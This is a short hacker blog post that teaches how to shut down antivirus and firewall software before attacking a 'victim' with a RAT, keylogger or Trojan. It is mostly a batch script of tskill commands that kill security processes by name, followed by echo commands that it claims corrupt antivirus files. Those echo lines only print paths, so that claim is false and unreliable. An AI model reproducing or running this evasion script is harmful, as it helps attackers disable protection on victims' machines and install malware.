2 things before you Attack your victim! What’s that? When you using rat or any other key logger or Trojan, it’s get detected by Antivirus application or get blocked by Firewall.
So we need make those application shutdowns before we attack. How? There is various ways to make them shutdown. I personally prefer batch coding. There is application Win RAR, with that application you can make deadly combination of various batches. Today we will learn how to code those batches.
tskill /A av* tskill /A fire* tskill /A anti* tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* tskill /A offg*
This batch will try to kill running process(antivirus).
echo %ProgramFiles%\alwils~1\avast4\*.* > nul echo %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe > nul echo %ProgramFiles%\kasper~1\*.exe > nul echo %ProgramFiles%\trojan~1\*.exe > nul echo %ProgramFiles%\f-prot95\*.dll > nul echo %ProgramFiles%\tbav\*.dat > nul echo %ProgramFiles%\avpersonal\*.vdf > nul echo %ProgramFiles%\Norton~1\*.cnt > nul echo %ProgramFiles%\Mcafee\*.* > nul echo %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.* > nul echo %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.* > nul echo %ProgramFiles%\Norton~1\Norton~1\*.* > nul echo %ProgramFiles%\Norton~1\*.* > nul echo %ProgramFiles%\avgamsr\*.exe > nul echo %ProgramFiles%\avgamsvr\*.exe > nul echo %ProgramFiles%\avgemc\*.exe > nul echo %ProgramFiles%\avgcc\*.exe > nul echo %ProgramFiles%\avgupsvc\*.exe > nul echo %ProgramFiles%\grisoft\*.* > nul echo %ProgramFiles%\nood32krn\*.exe > nul echo %ProgramFiles%\nood32\*.exe > nul echo %ProgramFiles%\nod32\*.* > nul echo %ProgramFiles%\nood32 > nul echo %ProgramFiles%\kav\*.exe > nul echo %ProgramFiles%\kavmm\*.exe > nul echo %ProgramFiles%\kaspersky\*.* > nul echo %ProgramFiles%\ewidoctrl\*.exe > nul echo %ProgramFiles%\guard\*.exe > nul echo %ProgramFiles%\ewido\*.exe > nul echo %ProgramFiles%\pavprsrv\*.exe > nul echo %ProgramFiles%\pavprot\*.exe > nul echo %ProgramFiles%\avengine\*.exe > nul echo %ProgramFiles%\apvxdwin\*.exe > nul echo %ProgramFiles%\webproxy\*.exe > nul echo %ProgramFiles%\panda software\*.* > nul
This last part will attempt to corrupt various functions of antivirus applications and has the highest possibility of working if the service is stopped and the application is terminated. However if it did not kill the antivirus this part could stop it from working properly.
To be continue....
0 comments:
Post a Comment